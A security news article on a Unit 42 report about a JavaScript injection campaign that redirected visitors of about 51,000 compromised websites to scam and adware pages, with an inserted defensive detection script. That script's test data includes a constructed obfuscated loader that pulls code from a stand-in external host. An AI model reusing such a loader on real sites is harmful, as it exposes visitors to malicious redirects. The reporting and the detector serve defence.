3-Year JS Injection Campaign Targets 51,000 Websites
Campaign Peaked in 2022, Continues to Infect Websites Using Obfuscation Tactics
Unit 42 researchers have been tracking this activity through 2022 and it continues to infect websites in 2023. They suspect the campaign "has impacted a large number of people, since hundreds of these infected websites were ranked in Tranco's top million websites."
Victims are typically redirected to an adware or a scam page, mostly masquerading as a well-known video-sharing platform or deceptive content that tricks victims into allowing an attacker-controlled website to send browser notifications.
"We also found that this campaign is multifaceted in that it performs multistep injections before redirecting to malicious web pages," said researchers, adding that it "uses obfuscation and benign append attacks to bypass detections."
The first instance of the campaign was observed in 2020 and the latest variants of this campaign were tracked between January 2022 and January 2023.
Researchers have detected the malware on an estimated 170,000 URLs from 51,000 hostnames since the beginning of 2022.
The campaign peaked between May and August 2022, when researchers spotted an average of 4,000 daily URLs. In January 2023, researchers said, they blocked about 240,000 sessions from these websites across 14,773 devices.
The campaign uses various techniques to bypass detection, including obfuscation, appending code to large benign files and multistep injections.
With obfuscation, the injected JS code hides its malicious payload to bypass detection. The code conceals the external URL that is used to load the malicious JS code and adds that code to the document object model.
By appending code to large benign files, the threat actors were able to evade detection by security crawlers.
In the samples the researchers observed, the malicious JS code injected into large JS files resembled the live detection examples of benign append attacks.
In all the above cases, researchers observed that the injected JS code appends external malicious JS code by manipulating the document object model, which gives the attacker the ability to change the malicious payload.
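One way to check a script for the two evasion techniques described above, as an added example that is not from the article or from Unit 42: it decodes `String.fromCharCode` strings and inspects only the end of a file, so a large benign body cannot hide an appended loader. The `String.fromCharCode` encoding, the function names, the 2,048-character window and the example hosts are assumptions; the article does not say which obfuscation the campaign used.

```javascript
// Added example: a tail-focused heuristic, not Unit 42's detection logic.
const TAIL_CHARS = 2048; // assumption: appended code sits in the last 2,048 characters

// Replace every String.fromCharCode(...) call with the string literal it produces,
// so hidden tag names and URLs become visible to the checks below.
function decodeCharCodes(src) {
  return src.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, args) =>
    JSON.stringify(String.fromCharCode(...args.split(',').map(Number))));
}

// Inspect only the end of a script so a large benign body cannot dilute the signal.
// Flags code that creates a <script> element, inserts it into the DOM and
// references a host other than the page's own.
function scanScript(source, pageHost) {
  const tail = decodeCharCodes(source.slice(-TAIL_CHARS));
  const createsScript = /createElement\(\s*["']script["']\s*\)/i.test(tail);
  const insertsNode = /\.(appendChild|insertBefore|append)\(/.test(tail);
  const hosts = [...tail.matchAll(/["'](?:https?:)?\/\/([a-z0-9.-]+)[^"']*["']/gi)]
    .map(m => m[1].toLowerCase())
    .filter(h => h !== pageHost.toLowerCase());
  return {
    suspicious: createsScript && insertsNode && hosts.length > 0,
    externalHosts: [...new Set(hosts)],
  };
}

// Constructed samples (not taken from the campaign): a large benign file,
// the same file with an obfuscated loader appended, and a first-party loader.
const encode = s => `String.fromCharCode(${[...s].map(c => c.charCodeAt(0)).join(',')})`;
const benignBody = 'function noop(){}\n'.repeat(5000);
const appendedLoader =
  `;(function(){var s=document.createElement(${encode('script')});` +
  `s.src=${encode('https://cdn.example.invalid/a.js')};document.head.appendChild(s);})();`;
const firstPartyLoader =
  ';var t=document.createElement("script");t.src="https://shop.example/app.js";' +
  'document.head.appendChild(t);';

console.log(scanScript(benignBody, 'shop.example'));                    // clean file
console.log(scanScript(benignBody + appendedLoader, 'shop.example'));   // appended loader
console.log(scanScript(benignBody + firstPartyLoader, 'shop.example')); // same-host loader
```

A hit is a triage signal, not a verdict: legitimately loaded third-party tags match the same pattern, so compare `externalHosts` against the site's known script sources before acting on it.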
"A more recent variant of this campaign injects malicious JS code onto a website. It then performs a series of intermediate JS injections before loading a payload that redirects victims to a malicious webpage," the researchers said. "One reason for including JS injections from different websites could be that attackers want to keep changing the URL that loads the final payload, in case the URL loading JS is blacklisted by security crawlers."
The final payload redirected victims to different websites before landing on the final scam webpage.
Unit 42 researchers suspect that a large number of websites may be compromised due to vulnerable content management system plug-ins. Researchers observed that around three-quarters of the 51,000 exploited websites were using a popular, unnamed CMS.
"The injected malicious JS code was included on the homepage of more than half of the detected websites. One common tactic used by the campaign's operators was to inject malicious JS code on frequently used JS filenames that are likely to be included on the homepages of compromised websites," the researchers said.
This tactic helped attackers target legitimate website users who are more likely to visit the website's home page.